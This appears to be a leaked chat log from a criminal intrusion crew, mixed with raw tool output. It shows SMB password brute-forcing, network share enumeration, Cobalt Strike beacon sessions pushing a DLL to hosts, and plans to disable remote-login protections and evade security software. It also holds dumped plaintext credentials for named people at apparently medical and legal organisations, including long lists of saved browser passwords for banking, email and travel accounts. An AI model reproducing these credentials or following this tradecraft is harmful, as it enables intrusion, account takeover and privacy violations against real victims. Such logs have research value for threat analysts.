Configuration Manager Client 5.00.8913.1000

Netop Remote Control Host 12.83.20175

Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.40660 12.0.40660

                                                                                  

Google Update Helper 1.3.35.451

Microsoft Report Viewer 2012 Runtime 11.1.3010.3

Microsoft Visual Studio 2010 Tools for Office Runtime (x64) 10.0.50330

Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.40660 12.0.40660

FortiClient 6.0.9.0277

Microsoft Policy Platform 68.1.1010.0
``Try set .it's default as .so it's default as WORKSTATION maybe? I didn't specify any domain just it says here with "." and there with workstation ``
[+] 10.5.6.21:445 - 10.5.6.21:445 - Success: '.\conn-selmer:&Green27!'
[+] 10.4.1.113:445 - 10.4.1.113:445 - Success: '.\conn-selmer:&Green27!'
[+] 10.1.7.226:445 - 10.1.7.226:445 - Success: '.\conn-selmer:&Green27!'
[+] 10.1.6.6:445 - 10.1.6.6:445 - Success: '.\conn-selmer:&Green27!'
[+] 10.1.7.224:445 - 10.1.7.224:445 - Success: '.\conn-selmer:&Green27!'
[+] 10.1.7.192:445 - 10.1.7.192:445 - Success: '.\conn-selmer:&Green27!'
``[ ](https://mediaeveryone.com/group/matches?msg=RjYLyv8W6SpZtN3L2) but with .[ ](https://mediaeveryone.com/group/matches?msg=wsgm4pkMDKaiXsNv3) but with '.''?
Pinging UKHECSLT3028.matches.com [10.20.4.4] with 32 bytes of data:
Request timed out.
Request timed out.

``This admin was not enabled at all on the Mercedes, I gave him this passwordUKHECSLT3028 and it is visible?[ ](https://mediaeveryone.com/group/matches?msg=WXdmjEJiTx32bPXgy) and with these accesses checked?
[+] 10.7.20.30:445 - 10.7.20.30:445 - Success: 'matches\Louisad:M@tches2020!
[+] 10.7.20.60:445 - 10.7.20.60:445 - Success: 'matches\Louisad:M@tches202020!!!'
[+] 10.7.20.55:445 - 10.7.20.55:445 - Success: 'matches\Louisad:M@tches202020!!!'
[+] 10.7.20.70:445 - 10.7.20.70:445 - Success: 'matches\Louisad:M@tches202020!!!'
[+] 10.7.20.80:445 - 10.7.20.80:445 - Success: 'matches\Louisad:M@tches202020!!!'
[+] 10.7.20.190:445 - 10.7.20.190:445 - Success: 'matches\Louisad:M@tches202020!!!'

``She didn't have winscp,ftp,putty,teamviewer...? then so far all the scans that have access and open 445 just hung file 0b and that's it ``regression-app-portal.matcheslocal.com [10.5.53.111]``what hosts did you check on ms17? did you check all the trusts? i.e. you didn't try on ms17? and what hosts did you check? did you only scan 2003? did you add his password to the brute force dictionary for yes? did you write "." did you write workstation? and with the admin account i assume the same situation? for the test do a couple of hosts, ok
try it with the domain in this case you found it registered outside the domain, which is strange he may be registered as LA with a domain account somewhere) if you put the domain, it is clear he will write Success everywhere) we scanned the local admins in the domain put "." or so I do not understand it and did not write in Conn-selmer, and gave out with the admin did not writeJust these should be his valid credentials and it everywhere to be as Success without an admina you when you scanned the domain did not write?aha)ah, well he's not an admin there didn't you go there?[ ](https://mediaeveryone.com/group/matches?msg=MbnvaHGsoKr8b6P2o) did you check this account[ ](https://mediaeveryone.com/group/matches?msg=NjWhmgmX7wnJK2TL3) did you check other hosts as LA?[ ](https://mediaeveryone.com/group/matches?msg=T8c6EfFFgKzH28gbc) and what's the polzak and what kind of machine? and the sloits about exec want SA with the password they sql 2017 stands brute force -brute force
sploit -dav in principle and on our deck on their network, too it's about scan from the deck under vpnomsploits by? on her machine - yes so we have tried everything? just wait?) she computer reboot rarely (27 last time), and go on rdp and turn it on the vpn only option that we can do with this machineNo, + maximum palevostiU on her pc is enabled NLA - on rdp does not allow to connect
We disabled it through the registry, but we have to reboot the computer for the changes to take effect.
if we reboot her computer and after the reboot will hang authorization window - our session will not come? mbh on the use of pshno I did not stay long and did not have time to review something by the way when the load tpsh ran, I just what just try to respawn or do not risk to rdp to climb?in the cob the session sagged, in the tpsh not responding why strange? rights just do not exist ... strangeadmin's balloon is only on the current machine ``
[*] Parsed 39 computer objects.
Shares for AD-C1:
	[--- Unreadable Shares ---]
		ADMIN$
		C$
		D$
		IPC$
	[--- Listable Shares ---]
		NETLOGON SYSVOL
Shares for mkemds:
	[--- Unreadable Shares ---]
		ADMIN$
		AustinRad
		C$
		D$
		IPC$
		MK
		T$
		Users

Shares for Expectations:
	[--- Unreadable Shares ---]
		ADMIN$
		C$
		D$
		Expectations
		IPC$
		Quest
		Users
		W$

Shares for MKSQL:
	[--- Unreadable Shares ---]
		ADMIN$
		B$
		C$
		D$
		G$
		H$
		I$
		IPC$
		J$

Shares for KNorton:
	[--- Unreadable Shares ---]
		ADMIN$
		C$
		D$
		IPC$
		Norton
		Y$

Shares for PremierCentral:
	[--- Unreadable Shares ---]
		ADMIN$
		C$
		CHI-EF
		D$
		IPC$
		PremierCentral
		Y$

Shares for Snell-Hargrove:
	[--- Unreadable Shares ---]
		ADMIN$
		C$
		D$
		Hargrove
		IPC$
		Y$

Shares for broker7:
	[--- Unreadable Shares ---]
		ADMIN$
		C$
		D$
		Faxes
		IPC$
		Users
		Y$

Shares for Garland:
	[--- Unreadable Shares ---]
		ADMIN$
		C$
		D$
		Garland
		IPC$
		Users
		Y$
	[--- Listable Shares ---]
		print$
Shares for ExpressFamily:
	[--- Unreadable Shares ---]
		ADMIN$
		C$
		D$
		expressfamily
		IPC$
		users
		Y$

Shares for TCT:
	[--- Unreadable Shares ---]
		ADMIN$
		C$
		D$
		IPC$
		TCT
		Users
		Y$

Shares for NGupta:
	[--- Unreadable Shares ---]
		ADMIN$
		C$
		D$
		Images
		IPC$
		Users
		Y$
	[--- Listable Shares ---]
		print$
Shares for FamilyDocs:
	[--- Unreadable Shares ---]
		ADMIN$
		C$
		D$
		FamilyDocs
		IPC$
		Users
		Y$

Shares for EssentialFamily:
	[--- Unreadable Shares ---]
		ADMIN$
		C$
		D$
		Essential Family
		Images
		IPC$
		Users
		Y$
	[--- Listable Shares ---]
		print$
Shares for SQL-C1:
	[--- Unreadable Shares ---]
		admin
		ADMIN$
		B$
		C$
		D$
		E$
		F$
		G$
		H$
		I$
		IPC$
		K$
		L$
		M$
		Midwest
		N$
		O$
		P$
		Q$
		R$
		S$
		T$
		U$
		V$
		W$
		X$
		Y$
		Z$

Shares for FamilyMedical:
	[--- Unreadable Shares ---]
		ADMIN$
		C$
		D$
		FMA
		IPC$
		Scans
		Users
		Y$

Shares for healdton:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$ D$ Healdton Users Y$
Shares for Broker5:
	[--- Unreadable Shares ---]
		ADMIN$
		Auburn Pain
		C$
		Camellia
		D$
		IPC$
		Medicos
		Users
		Y$

Shares for MHG-FAX-DT:
	[--- Unreadable Shares ---]
		ADMIN$
		C$
		IPC$

Shares for FDFHFAXIN:
	[--- Unreadable Shares ---]
		ADMIN$
		C$
		IPC$

Shares for WORKSTATION-209:
	[--- Unreadable Shares ---]
		ADMIN$
		C$
		IPC$

Shares for MKFAX-SERVER:
	[--- Unreadable Shares ---]
		ADMIN$
		C$
		front
		HL7
		IPC$
	[--- Listable Shares ---]
		print$

``Serious policies by the way.
Force user logoff how long after time expires?: Never
Minimum password age (days): 1
Maximum password age (days): 42
Minimum password length: 8
Length of password history maintained: 2
Lockout threshold: 5
Lockout duration (minutes): 3
Lockout observation window (minutes): 3
Computer role: PRIMARY

```:zany_face:``we've been exposedfinitalacomedywithdns cache in the sitbelt was``.
  Entry : wikibros.com
  Name : wikibros.com
  Data : 23.106.160.61

  Entry : wideio.com
  Name :
  Data :

  Entry : wideio.com
  Name : wideio.com
  Data : 23.19.227.186
The ``check #general``.
 Get-PSReadLineOption
The term 'Get-PSReadLineOption' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
``You're welcome to see history file path or something like that after execution. Can you remind me the command to clean the psh, please? ok, ok, work until you get to the psh?
```
C:\Users\Healdton.IT\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://login.zirmed.com/,https://login.zirmed.com/ui/Login/Failed,2/20/2020 8:46:37 AM,13226683597880246,tpchcclay,PCH@2019!
No kerbs, no rubus (kerb, asrep), no invoc kerb found anything can you continue to report the results of the workahahahahahahais now will remove the kerbsNet-GPPPassword did not give anything just reported the situation I did not say that there is nothing and do nothing but the car in the domain and it opens a lot of vectors current car - the server, but I am not LA there` ``
Group name Domain Admins
Comment Designated administrators of the domain

Members

-------------------------------------------------------------------------------
dsechrist kkohl
```
```
Group name Enterprise Admins
Comment Designated administrators of the enterprise

Members

-------------------------------------------------------------------------------
dsechrist kkohl
```
```
Alias name Administrators
Comment Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
dsechrist
STG-HEALTHCARE\Domain Admins

``NON-DOMAIN
```
SCCY-MODUSLT
SCCY-PRODUCTION
VANNDATA
DESKTOP-GP0L2NF
DESKTOP-15BLUKS
DESKTOP-TEODH7E
0EA78803
The second one has a lot of links to shared resources. In general, these satellites are more like filewashing sites. the one that has the craps has a capacity of 1Tb what is there at all?
 History (VDSADMIN):

       https://huntress-installers.s3.amazonaws.com
       https://huntress-installers.s3.amazonaws.com
       https://huntress-installers.s3.amazonaws.com/0.11.64.exe?response-content-disposition=attachment%3B%20filename%3DHuntressInstaller.exe&response-content-type=application%2Foctet-stream&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIARAAI7IUXLVVVG3PJ%2F20210125%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20210125T200124Z&X-Amz-Expires=60&X-Amz-SignedHeaders=host&X-Amz-Signature=b49c8f6de6b20ecacddf305a5163508fa53aa16718c22bdb7c249eac8521511eHuntressInstaller.exemoc.swanozama.3s.srellatsni-ssertnuh
``````
User: sccyadmin - IP Address: 10.0.0.6
User: VannData - IP Address: 10.1.4.205
``This is us between us and where?
10.1.4.175
admin:vanndatashmamdata
``NAS
```
10.1.4.175:80

10.0.0.51:80 datto control center

10.0.0.4:80
``ts sccy-fs mfgwin10-1
http://10.0.0.200:8000/,http://10.0.0.200:8000/,11/16/2020 10:39:56 AM,13250014796840092,,
http://10.0.0.202/,http://10.0.0.202/,12/2/2020 3:53:53 PM,13251416033085523,,
http://10.0.0.21/NETGEAR R8000P,http://10.0.0.21/,1/11/2021 4:01:07 PM,13254872467540386,,

``````
	 * Username : vdsadmin
	 * Domain : SCCY
	 * Password : T@ng0D0wn!
```
```
User : vdsadmin - IP Address : 10.0.0.75
User: VannData - IP Address: 10.0.0.5
? ``want to get the account from here.huntress.i give you a link to the softs QR Go to the link What kind of protection? a conspiracy of lokers it is protection from lokers see we are not the first)) they found on their computer, what is it?
```

	 * Username : JamesD
	 * Domain : SCCY.LOCAL
	 * Password : Jd07101995

	 * Username : toy
	 * Domain : SCCY.LOCAL
	 * Password : 2Pink4u123

	 * Username : karend
	 * Domain : SCCY.LOCAL
	 * Password : Karrie10!

	 * Username : qc
	 * Domain : SCCY
	 * Password : secure4qc

	 * Username : davidd
	 * Domain : SCCY.LOCAL
	 * Password : Monksman1!
``YES``
```
InstallA NOC_HelpDesk Passportal_Srvc
VannData vdsadmin

```
EA
```
InstallA VannData vdsadmin
```
SA
```
InstallA sccyadmin
``not a fact, but it's very likely that they are not there at the third party service[ ](https://mediaeveryone.com/group/sccy-com?msg=2CqXrpzsQwqiizHbN) ?waiting for a list of external backups still prepare to closeuser8user3 and I'm waiting for the crd from nasovtut to close today?the question was where are we wasting our time in general, I'm not talking about this network where 21k nets are the quietest waysshaprhoud\accesses to the sharas*try eleveits\shaprhoud\accesses to the sharas*gather comps and servers where to brute force a different way to tell me how you waste time while collecting hell? (I always run after collecting info+ where are the hashes?rubeus i always started after gathering information + where are the hashes? -would it be quieter to gather by handWhy tulchy new domainCan always start with this (YES LA EA adinfo)the question is why the fuck do i know that this is from tulchynae know what or how it is connected, but after the adfind finished files and the archive started downloading the session diedwhy use it?


[*] Tasked beacon to run .NET program: check.exe adflogs
[+] host called home, sent: 110661 bytes
[+] received output:
333301283

[*] Tasked beacon to run .NET program: check.exe adflogs
[+] host called home, sent: 110661 bytes
[+] received output:
398533948

[*] Tasked beacon to run .NET program: check.exe adflogs
[+] host called home, sent: 110661 bytes
[+] received output:
437262015

``Why is it definitely dead now (-from mathem.local there are still live sessions? It's too big if you work with it don't fuck it up``.

Group name Domain Admins
Comment Designated administrators of the domain

Members

-------------------------------------------------------------------------------
bbt0097 reconwindomp suQARSp_admin
suWATprod
The command completed successfully.

``I spammed a new one, try it yourself there is only 1 session at all do any command and dies spamming session banally ask YES and the session dies everything is bad, just terrible, does not give anything to do all who have problems go to this coboo and work from there ``
flexzap.com
``````
192.254.78.106:30504
sUSsQS7WpevaVL12GSMXs8Z10cXXski8ins
``cannot use eleveits@tl1
In the new coba from the user does not give anything to do
```
[-] could not spawn C:\WINDOWS\sysnative\wusa.exe: 740
[-] Could not connect to pipe: 2
``hi:space_invader:hello
it's the only method to dump chrome without a session on the machine we dumped the masterkey, and it's not coming, so we're trying to dump the masterkey with the file
It's not like it's a backup, huh?
I wonder what clupload has to do with it... Whatever, so do it.
and offline solved the problem I threw how to pull chrome through DPAPI found a polzak masterkey that goes to malwarenu to decrypt the DPAPI content chrome in sharp chrome master-key can somehow work? maybe from it a folder OutLook I don't know
it doesn't say anything...and sitbell search for credentials came up login credentials.jpg
```
C:\Users\johni\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\58CKFMPE
What is this and where does it come from? Search for cloud storage access further in the browserswhich software accesses these cloudsand then find out what it is and understand what it is
NAS/network hardware or what see what admin is hanging out there and blow on the 80/443 ports
to figure out what's up with the host already i'm thinking how the hell it was!!!!!!!!!```
it's on d
```
ls \hostname\d$

gives an output or what?
I do not know how to comment on the attempt to copy inaccessible dira
what to do in this case is obvious in my opinion, sorry it's all open ports3389 can be checked
in hell you can check what axis is still open? if the drive C does not exist - there can only be one fucking obvious assumption) it's not even an error to correct you somewhere you try to copy the file to a non-existent dira I do not know what to add you are so verbose ...
(ICMP) Target '192.168.100.97' is alive. [read 8 bytes]

[+] received output:
192.168.100.97:443

[+] received output:
192.168.100.97:80
192.168.100.97:22 (SSH-2.0-dropbear_2014.63)
``Scan to everything''.
usr2-2-2[DOUGLAS-PC]SYSTEM */12596|2020Oct13 01:00:27> shell dir \\desktop-33jh80d.sprouselaw.com\c$
[*] Tasked beacon to run: dir \\desktop-33jh80d.sprouselaw.com\c$
[+] host called home, sent: 70 bytes
[+] received output:
The network path was not found.

``22shell dir \\desktop-33jh80d.sprouselaw.com\c$already tried445 which ports can be scanned?
usr2-2-2[DOUGLAS-PC]SYSTEM */12596|2020Oct13 00:58:27> shell net view \\desktop-33jh80d.sprouselaw.com
[*] Tasked beacon to run: net view \desktop-33jh80d.sprouselaw.com
[+] host called home, sent: 72 bytes
[+] received output:
System error 53 has occurred.

The network path was not found.

```
same kind of ballyhoo then so yeah.
Name: desktop-33jh80d.sprouselaw.com
Address: 192.168.100.97
```
that's his host, the one you threw in is DK
\zion.sprouselaw.com
``but try the hostname``
usr2-2-2[DOUGLAS-PC]SYSTEM */12596|2020Oct13 00:49:54> shell net view \\\192.168.100.97
[*] Tasked beacon to run: net view \\192.168.100.97
[+] host called home, sent: 56 bytes
[+] received output:
System error 53 has occurred.

The network path was not found.

usr2-2-2[DOUGLAS-PC]SYSTEM */12596|2020Oct13 00:53:59> shell ping 192.168.100.97 -n 1
[*] tasked beacon to run: ping 192.168.100.97 -n 1
[+] host called home, sent: 55 bytes
[+] received output:

Pinging 192.168.100.97 with 32 bytes of data:
Reply from 192.168.100.97: bytes=32 time<1ms TTL=64

Ping statistics for 192.168.100.97:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms

usr2-2-2[DOUGLAS-PC]SYSTEM */12596|2020Oct13 00:54:48> shell nslookup 192.168.100.97
[*] Tasked beacon to run: nslookup 192.168.100.97
[+] host called home, sent: 54 bytes
[+] received output:
Server: zion.sprouselaw.com
Address: 192.168.100.240

Name: desktop-33jh80d.sprouselaw.com
Address: 192.168.100.97

```
I don't know what to do, there is no view on the host/ipnu scan to the win ports How can you check this? I'm not sure of anything in life so how do you copy to a folder you can't see? are you sure it's a win machine? @user8 from any machine as long as the machine sees all domain controllers
usr2-2-2[DOUGLAS-PC]SYSTEM */12596|2020Oct13 00:44:06> ls \\\192.168.100.97\C$\
[*] Tasked beacon to list files in \\192.168.100.97\C$\
[+] host called home, sent: 37 bytes
[-] could not open \192.168.100.97\C$\*: 53
usr2-2-2[DOUGLAS-PC]SYSTEM */12596|2020Oct13 00:44:50> ls \\192.168.100.97\C$\ProgramData
[*] Tasked beacon to list files in \192.168.100.97\C$\ProgramData
[+] host called home, sent: 49 bytes
[-] could not open \192.168.100.97\C$\ProgramData\*: 53
Sure it works on any machine or is it better with the DK? Is the folder accessible? And with ls \192.168.100.97\C$\ProgramData@tl2
```
usr2-2-2[DOUGLAS-PC]SYSTEM */12596|2020Oct13 00:41:13> shell copy C:\ProgramData\updates.dll \\\192.168.100.97\C$\ProgramData\
[*] Tasked beacon to run: copy C:\ProgramData\updates.dll \\192.168.100.97\$\ProgramData\
[+] host called home, sent: 95 bytes
[+] received output:
The network path was not found.
        0 file(s) copied.

``@user7 for what reason? What failed?
192.168.100.238
```
+
I connected and it just froze, then I couldn't get the dll on it
192.168.100.97 -
192.168.100.98 -
192.168.100.99 -
192.168.100.94 -
192.168.100.95 -
```
couldn't get on these machineshttp://habr.com/ru/post/434514/`Mitel/192.168.100.235twd/jyhu\judy sprouse350```Mitel/192.168.100.235twd/ccolumbus\christinec changeme````
How to use VPN

1. Double-click the VPN icon on the Desktop

Skip (2. Double-click 38.68.2.51)

Enter username JeffH (case sensitive)

4. Enter password Sprouse20!

5. click OK

---------------

6. When finished, right-click 38.68.2.51 > click Disable

7. Close the VPN window.
````Mitel/192.168.100.235twd/tirion\terry Terry1`Mitel/192.168.100.235/cmogonye\courtney changeme` on DA computer installed PasswordsPlus`Mitel/192.168.100.235/redwards\reva sss3500rbe````
URL : https://www.heb.com/myaccount/login.jsp
Username : susan.hillyer@sprouselaw.com
Password : shSprouse2019

--- Chromium Credential (User: susanh) ---
URL : https://www.tbls.org/
Username : 17408600
Password : barons26

--- Chromium Credential (User: susanh) ---
URL : https://web1.zixmail.net/s/setup
Username : susan.hillyer@sprouselaw.com
Password : Sprouse2020

--- Chromium Credential (User: susanh) ---
URL : https://www.adr.org/aaa/faces/register
Username : SprouseVictoria
Password : Sprouse2020

--- Chromium Credential (User: susanh) ---
URL : https://apps.adr.org/AAAApp/faces/login.jsf
Username : SprouseVictoria
Password : Sprouse2020

--- Chromium Credential (User: susanh) ---
URL : https://ep4.ingeo.com/Login.aspx
Username : sprouselaw34
Password : Sprouse2020sh

````Mitel/192.168.100.235twd/shillyer\susanh Sprouse2016SH````
--- Chromium Credential (User: bill) ---
URL :
Username : bill.russell@sprouselaw.com
Password : Br2020$

--- Chromium Credential (User: bill) ---
URL :
Username : barons26
Password : barons26

--- Chromium Credential (User: bill) ---
URL :
Username : B3M205
Password : Iw$500fa

--- Chromium Credential (User: bill) ---
URL :
Username : russelllabeff2
Password : iw$500fmp

--- Chromium Credential (User: bill) ---
URL :
Username : russelllabeff2
Password : iw$500fmp

--- Chromium Credential (User: bill) ---
URL :
Username : russelllabeff2
Password : iw$500fmp

--- Chromium Credential (User: bill) ---
URL :
Username : russelllabeff2
Password : iw$500fmp

--- Chromium Credential (User: bill) ---
URL :
Username : barons26@yahoo.com
Password : 202020

--- Chromium Credential (User: bill) ---
URL :
Username : jbrrussell@suddenlink.net
Password : iw$500fcr

--- Chromium Credential (User: bill) ---
URL :
Username : barons26
Password : 202020

--- Chromium Credential (User: bill) ---
URL :
Username : bill.russell@sprouselaw.com
Password : barons26

--- Chromium Credential (User: bill) ---
URL :
Username : jbrrussell@suddenlink.net
Password : br202020

--- Chromium Credential (User: bill) ---
URL :
Username : RJ6STJ4
Password : barons26

--- Chromium Credential (User: bill) ---
URL :
Username : RJ6STJ4
Password : barons26

--- Chromium Credential (User: bill) ---
URL :
Username : jbrrussell@suddenlink.net
Password : Iw$2020ffb

--- Chromium Credential (User: bill) ---
URL :
Username : russell@suddenlinkmail.com
Password : br202020

--- Chromium Credential (User: bill) ---
URL :
Username : 16493982
Password : Baron$26

--- Chromium Credential (User: bill) ---
URL :
Username : barons26
Password : fffF666^

--- Chromium Credential (User: bill) ---
URL :
Username : 349281159
Password : Baron$26

--- Chromium Credential (User: bill) ---
URL :
Username : jbrrussell@suddenlink.net
Password : 20202020

--- Chromium Credential (User: bill) ---
URL :
Username : bill.russell@sprouselaw.com
Password : 202020

--- Chromium Credential (User: bill) ---
URL :
Username : Barons26
Password : Baron$26

--- Chromium Credential (User: bill) ---
URL :
Username : 5129451807
Password : Barons26

--- Chromium Credential (User: bill) ---
URL :
Username : Mallarae
Password : Henry1776

--- Chromium Credential (User: bill) ---
URL :
Username : Mallarae
Password : Henry1776

--- Chromium Credential (User: bill) ---
URL :
Username : bill
Password : Sprouse2013BR

--- Chromium Credential (User: bill) ---
URL :
Username : 17408600
Password : barons26

--- Chromium Credential (User: bill) ---
URL :
Username : 17408600
Password : barons26

--- Chromium Credential (User: bill) ---
URL :
Username : BILL.RUSSELL@SPROUSELAW.COM
Password : 20202020

--- Chromium Credential (User: bill) ---
URL : https://www.united.com/en/us
Username : *****172
Password : Iw$500fual

--- Chromium Credential (User: bill) ---
URL : https://www.united.com/web/en-US/apps/sso/Login.aspx
Username : DT435172
Password : Iw$500fual

--- Chromium Credential (User: bill) ---
URL :
Username : KITEMINI
Password : Iw$500fusaa

--- Chromium Credential (User: bill) ---
URL :
Username : RUS1184105
Password : 202020

--- Chromium Credential (User: bill) ---
URL : https://accounts.google.com/signin/v2/challenge/password/empty
Username : barons26
Password : baron$26

--- Chromium Credential (User: bill) ---
URL : https://www.oceaniacruises.com/cruise-finder/
Username : bill.russell@sprouselaw.com
Password : 202020

--- Chromium Credential (User: bill) ---
URL : javascript:void(0);
Username : russelllabeff2
Password : iw$500fmp

--- Chromium Credential (User: bill) ---
URL : https://signin.lexisnexis.com/lnaccess/Transition
Username : barons26
Password : fffF666^

--- Chromium Credential (User: bill) ---
URL : https://www.earthpoint.us/SignIn.aspx
Username : jbrrussell@suddenlink.net
Password : br202020

--- Chromium Credential (User: bill) ---
URL : https://sso.accounts.dowjones.com/login
Username : barons26
Password : 202020

--- Chromium Credential (User: bill) ---
URL : https://www.united.com/en/us
Username : DT435172
Password : Iw$500fual

--- Chromium Credential (User: bill) ---
URL : https://www.oceaniacruises.com/login/
Username : bill.russell@sprouselaw.com
Password : 202020

--- Chromium Credential (User: bill) ---
URL : https://www.marriott.com/aries-auth/loginWithCredentials.comp
Username : 349281159
Password : Baron$26

--- Chromium Credential (User: bill) ---
URL : https://www.att.com/my/
Username : jbrrussell@me.com
Password : Iw$500fatt

--- Chromium Credential (User: bill) ---
URL : https://www.delta.com/
Username : 9350391968
Password : Iw$500fd

--- Chromium Credential (User: bill) ---
URL : https://www.aopa.org/login/Default/index.cfm
Username : barons26
Password : barons26

--- Chromium Credential (User: bill) ---
URL : https://secure.classmates.com/auth/login
Username : barons26@yahoo.com
Password : 202020

--- Chromium Credential (User: bill) ---
URL : https://outlook.sprouselaw.com/owa/auth.owa
Username : bill
Password : Sprouse2013BR

--- Chromium Credential (User: bill) ---
URL : https://www.tbls.org/MyTBLS/Login.aspx
Username : 17408600
Password : barons26

--- Chromium Credential (User: bill) ---
URL : https://www.avis.com/en/
Username : B3M205
Password : Iw$500fa

--- Chromium Credential (User: bill) ---
URL : https://www.veteransadvantage.com/vauser3/auth2/process
Username : RUS1184105
Password : 202020

--- Chromium Credential (User: bill) ---
URL : https://www.nutrisystem.com/jsp/myaccount/login/login.jsp
Username : jbrrussell@suddenlink.net
Password : 20202020

--- Chromium Credential (User: bill) ---
URL : https://accounts.google.com/
Username : barons26a
Password : usafa1978

--- Chromium Credential (User: bill) ---
URL : https://www.texasbarcle.com/cle/AALookupPassword.asp
Username : BILL.RUSSELL@SPROUSELAW.COM
Password : 20202020

--- Chromium Credential (User: bill) ---
URL : https://enroll.schwab.com/AoUI/
Username : Mallarae
Password : Henry1776

--- Chromium Credential (User: bill) ---
URL : https://www.facebook.com/login/device-based/regular/login/
Username : jbrrussell@suddenlink.net
Password : Iw$2020ffb

--- Chromium Credential (User: bill) ---
URL : https://legacy.enterprise.com/car_rental/enterprisePlusLoginWidget.do
Username : RJ6STJ4
Password : barons26

--- Chromium Credential (User: bill) ---
URL : javascript:void(0);
Username : russelllabeff2
Password : iw$500fmp

--- Chromium Credential (User: bill) ---
URL : https://www.dropbox.com/ajax_login
Username : bill.russell@sprouselaw.com
Password : barons26

--- Chromium Credential (User: bill) ---
URL : https://www.dropbox.com/ajax_login
Username : bill.russell@sprouselaw.com
Password : barons26

--- Chromium Credential (User: bill) ---
URL : https://ec.consumerreports.org/ec/cro/sem/login.htm
Username : jbrrussell@suddenlink.net
Password : iw$500fcr

--- Chromium Credential (User: bill) ---
URL : https://login.optumbank.com/CAP/Portlets/login.jsf
Username : Barons26
Password : Baron$26

--- Chromium Credential (User: bill) ---
URL : https://www.americanbar.org/auth/login/
Username : bill.russell@sprouselaw.com
Password : Br2020$

--- Chromium Credential (User: bill) ---
URL : https://flightaware.com/account/session
Username : russell@suddenlinkmail.com
Password : br202020

--- Chromium Credential (User: bill) ---
URL : https://www.texasbar.com/AM/Template.cfm
Username : 17408600
Password : barons26

--- Chromium Credential (User: bill) ---
URL : javascript:void(0);
Username : russelllabeff2
Password : iw$500fmp

--- Chromium Credential (User: bill) ---
URL : https://www.enterprise.com/en/home.html
Username : RJ6STJ4
Password : barons26

--- Chromium Credential (User: bill) ---
URL : https://www.paygonline.com/websc/logon.html
Username : 5129451807
Password : Barons26

--- Chromium Credential (User: bill) ---
URL : javascript:void(0);
Username : russelllabeff2
Password : iw$500fmp

--- Chromium Credential (User: bill) ---
URL : javascript:void(0);
Username : barons26
Password : iw1956fmp

--- Chromium Credential (User: bill) ---
URL : https://www.hertz.com/rentacar/reservation/
Username : 16493982
Password : Baron$26

--- Chromium Credential (User: bill) ---
URL : https://www.enterprise.com/en/home.html
Username : RJ6STJ4
Password : barons26

--- Chromium Credential (User: bill) ---
URL : https://www.usaa.com/inet/ent_logon/j_security_check
Username : KITEMINI
Password : Iw$500fusaa

--- Chromium Credential (User: bill) ---
URL : https://www.facebook.com/login/device-based/regular/login/
Username : jbrrussell@suddenlink.net
Password : Iw$2020ffb

--- Chromium Credential (User: bill) ---
URL : https://lms.schwab.com/Login
Username : Mallarae
Password : Henry1776

--- Chromium Credential (User: bill) ---
URL : https://www.celebritycruises.com/
Username : jbrrussell
Password : br2020

--- Chromium Credential (User: bill) ---
URL : https://chaseonline.chase.com/Logon.aspx
Username : russelllabeff2
Password : iw$500fmp

--- Chromium Credential (User: bill) ---
URL : https://www.delta.com/custlogin/login.action
Username : 9350391968
Password : Iw$500fd

--- Chromium Credential (User: bill) ---
URL : https://www.delta.com/custlogin/login.action
Username : 9350391968
Password : Iw$500fd

--- Chromium Credential (User: bill) ---
URL : https://www.united.com/en/us
Username : *****172
Password : Iw$500fual

--- Chromium Credential (User: bill) ---
URL : https://onlinebanking.bankofoklahoma.com/Login/SubmitLogin
Username : bervjr
Password : Baron$26

--- Chromium Credential (User: bill) ---
URL : javascript:void(0);
Username : barons26
Password : iw1956fmp

--- Chromium Credential (User: bill) ---
URL : https://www.amazon.com/ap/signin
Username : barons26@yahoo.com
Password : 202020

--- Chromium Credential (User: bill) ---
URL : https://us1.proofpointessentials.com/app/login.php
Username : bill.russell@sprouselaw.com
Password : 20202020

--- Chromium Credential (User: bill) ---
URL : https://www.celebritycruises.com/account/signin
Username : jbrrussell@suddenlink.net
Password : barons26

--- Chromium Credential (User: bill) ---
URL : https://www.ups.com/lasso/login
Username : jbrrussell
Password : Baron$26

--- Chromium Credential (User: bill) ---
URL : https://onlinebanking.bankofoklahoma.com/login/loginsubmit
Username : bervjr
Password : Baron$26

--- Chromium Credential (User: bill) ---
URL : https://web1.zixmail.net/s/register
Username : bill.russell@sprouselaw.com
Password : Baron$26

--- Chromium Credential (User: bill) ---
URL : https://www.marriott.com/aries-auth/loginWithCredentials.comp
Username : 349******
Password : Baron$26

--- Chromium Credential (User: bill) ---
URL : https://app.mt.gov/epass-idp/Authn/EpassCreate/
Username : mallarae
Password : 32mallarae

--- Chromium Credential (User: bill) ---
URL : javascript:void(0);
Username : russelllabeff2
Password : iw$500fmp

--- Chromium Credential (User: bill) ---
URL : javascript:void(0);
Username : barons26
Password : iw1956fmp

--- Chromium Credential (User: bill) ---
URL : https://www.marriott.com/aries-auth/loginWithCredentials.comp
Username : 349******
Password : Baron$26

--- Chromium Credential (User: bill) ---
URL : https://securemail.americanmomentum.bank/s/register
Username : bill.russell@sprouselaw.com
Password : Baron$26

--- Chromium Credential (User: bill) ---
URL : https://accounts.google.com/signin/v2/challenge/password/empty
Username : barons26@gmail.com
Password : dtjyqh32

--- Chromium Credential (User: bill) ---
URL : https://mobile.usaa.com/inet/ent_logon/j_security_check
Username : KITEMINI
Password : Iw$500fusaa

--- Chromium Credential (User: bill) ---
URL : javascript:void(0);
Username : 45583567
Password : Iw2019fmpe

--- Chromium Credential (User: bill) ---
URL : https://accounts.google.com/signin/v2/challenge/password/empty
Username : russell@suddenlinkmail.com
Password : iw$500fg

--- Chromium Credential (User: bill) ---
URL : https://healthsafeid.optumbank.com/
Username : Barons26
Password : Baron$26

--- Chromium Credential (User: bill) ---
URL : https://www.trade-a-plane.com/user-signup/create_account
Username : barons26
Password : 20202020

